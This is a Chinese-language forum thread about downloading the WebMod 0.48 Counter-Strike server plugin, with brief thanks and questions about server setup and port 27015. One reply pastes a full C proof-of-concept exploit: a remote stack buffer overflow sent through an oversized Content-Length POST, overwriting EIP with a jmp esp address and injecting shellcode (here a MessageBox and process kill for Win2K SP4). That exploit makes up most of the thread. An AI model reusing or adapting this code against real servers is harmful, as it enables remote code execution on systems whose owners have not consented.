搜索
楼主: wzf828

浏览器管理插件WebMod_0.48 WebMod_0.47修正版下载

[复制链接]
发表于 2007-5-29 12:58:30 | 显示全部楼层 来自 中国–广东–珠海

回复: 浏览器管理插件WebMod_0.48 WebMod_0.47修正版下载

应该不错吧``有空试试
回复

使用道具 举报

发表于 2007-6-1 09:34:02 | 显示全部楼层 来自 中国–陕西–西安

回复: 浏览器管理插件WebMod_0.48 WebMod_0.47修正版下载

如果cs服务器和web服务器是两台机器,可以实现不???
回复

使用道具 举报

发表于 2007-6-1 11:32:23 | 显示全部楼层 来自 中国–陕西–西安

回复: 浏览器管理插件WebMod_0.48 WebMod_0.47修正版下载

我怎么搜索到了WebMod 0.48 (Content-Length) Remote Buffer Overflow Exploit PoC

/*
* WebMod Stack Buffer Overflow
*
* by cybermind (Kevin Masterson)
* cybermind@gmail.com
*
* WebMod v0.48 exploit PoC code
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <winsock.h>
#pragma comment (lib, "ws2_32.lib")

/*
local variables in connectHandle():

char *input; 4
char buf[8192+1]; 8193
int i,j; 8
int connfd; 4
int myid; 4
threaddata_t *tdata; 4
httpquery_t query; 149036
char tmp[1025]; 1025
int rcv; 4
char clbuf[11]; 11

total: 158293
actual (due to padding): 158308


   breakdown of types:
typedef struct s_var { 546
   char name[33];    33
   char value[513];    513
} var_s;


typedef struct s_httpquery { 149036
   char method[11];    11
   char clientip[16];    16
   char url[257];    257
   char *get;    4
   char *post;    4
   char *cookies;    4
   var_s vars[256];    139776
   char currentmapname[257];    257
   char sendcookies[8192+1];    8193
   char contenttype[257];    257
   char location[257];    257
} httpquery_t;
*/

//contains data to fill the Content-Length field with
char spambuf[20000];

//code to inject
//this particular code only works on Win2K SP4 (v5.0.4.0)
//and kernel32.dll v5.0.2195.6688
unsigned char code[] = {
// ; push string onto the stack without using 0x00
0xB8, 0x59, 0x5A, 0x32, 0x11, //mov      eax, 11325A59h ; "HI!\0" + 11111111h
0x2D, 0x11, 0x11, 0x11, 0x11, //sub      eax, 11111111h
0x50, //push     eax
0x8B, 0xC4, //mov      eax, esp ; eax points to string

0x33, 0xC9, //xor      ecx, ecx ; zero

// ; call MessageBox
0x51, //push     ecx ; flags (0)
0x50, //push     eax ; caption
0x50, //push     eax ; text
0x51, //push     ecx ; hwnd (0)
0xB8, 0x98, 0x80, 0xE3, 0x77, //mov      eax, 77E38098h ; &MessageBox
0xFF, 0xD0, //call     eax

// ; call GetCurrentProcessId
0xB8, 0xF4, 0xB8, 0x4E, 0x7C, //mov      eax, 7C4EB8F4h ; &GetCurrentProcessId
0xFF, 0xD0, //call     eax

0x33, 0xC9, //xor      ecx, ecx ; zero

// ; call TerminateProcess
0x51, //push     ecx ; return code (0)
0x50, //push     eax ; process id
0xB8, 0xC3, 0x8D, 0x51, 0x7C,    //mov      eax, 7C518DC3h ; &TerminateProcess
0xFF, 0xD0 //call     eax

};

//EIP you want to insert, this points to an "FF E4" (jmp esp) in w_mm.dll
//set this to 0xFFFFFFFF to just cause a crash
unsigned int our_eip = 0x67E03C5B;

int main(int argc, char* argv[]) {
WSADATA wsadata;
int sock = 0;
struct hostent* host = NULL;
struct sockaddr_in saddr;

//data to sent initially
char initbuf[] = "POST / HTTP/1.1\nHost: localhost:27015\nContent-Length: ";

//data to send after headers
char endbuf[] = "\n\n";

char* hostname = NULL;
short hostport = 27015;

int i;
unsigned int sent = 0;

//get host/port from command line
if (argc < 2) {
printf("Usage:\t%s <hostname|ip> [port=27015]\n", argv[0]);
return 1;
}
hostname = argv[1];
if (argc >= 3) hostport = atoi(argv[2]);

WSAStartup(MAKEWORD(1,1), &wsadata);

sock = socket(AF_INET, SOCK_STREAM, 0);
if (sock <= 0) {
printf("socket() error\n");
return 1;
}

host = gethostbyname(hostname);
if (!host) {
printf("gethostbyname() error\n");
return 1;
}

printf("Resolved \"%s\" to %s\n", hostname, inet_ntoa(*(struct in_addr*)host->h_addr_list[0]));

memset(&saddr, 0, sizeof(struct sockaddr_in));
saddr.sin_family = AF_INET;
saddr.sin_port = htons(hostport);
memcpy(&saddr.sin_addr.s_addr, host->h_addr_list[0], host->h_length);

if (connect(sock, (struct sockaddr*)&saddr, sizeof(struct sockaddr)) < 0) {
printf("connect() error\n");
return 1;
}

//initialize buffers
memset(spambuf, 'a', sizeof(spambuf));

//send initial POST request
sent += send(sock, initbuf, sizeof(initbuf)-1, 0);

//send 7 full spambufs to get 140000 bytes
for (i = 0; i < 7; ++i)
sent += send(sock, spambuf, sizeof(spambuf), 0);

//send partial spambuf to fill remaining data
//(18308, this goes right up to the EIP)
sent += send(sock, spambuf, 18308, 0);

//fill EIP
sent += send(sock, (char*)&our_eip, sizeof(our_eip), 0);

//insert code!
sent += send(sock, (char*)code, sizeof(code), 0);

//send newlines after content-length
sent += send(sock, endbuf, sizeof(endbuf)-1, 0);

printf("%u bytes sent...waiting...\n", sent);

//wait for a while so the socket isn't closed on our end
//before they receive all the data
Sleep(15000);

return 0;
}
回复

使用道具 举报

发表于 2007-6-13 18:57:12 | 显示全部楼层 来自 中国–广东–广州–天河区

回复: 浏览器管理插件WebMod_0.48 WebMod_0.47修正版下载

支持楼主!!!!!!:)
回复

使用道具 举报

发表于 2007-6-24 10:07:00 | 显示全部楼层 来自 中国–河南–济源

回复: 浏览器管理插件WebMod_0.48 WebMod_0.47修正版下载

Post by 一辉
如果cs服务器和web服务器是两台机器,可以实现不???

同问
代理服务器上开有WEB,CS服建在内网,要怎么设置,还要做个TCP的27015端口映射吗
回复

使用道具 举报

发表于 2009-4-2 17:42:17 | 显示全部楼层 来自 中国–重庆–重庆
找到了,谢谢.
回复

使用道具 举报

发表于 2009-5-21 15:52:44 | 显示全部楼层 来自 中国–广东–东莞
什么东东都拿来试试,管它呢,
回复

使用道具 举报

发表于 2009-10-17 10:02:10 | 显示全部楼层 来自 中国–陕西–西安
是不是要先弄IIS然后才行呢?
回复

使用道具 举报

游客
回复
您需要登录后才可以回帖 登录 | 注个册吧

快速回复 返回顶部 返回列表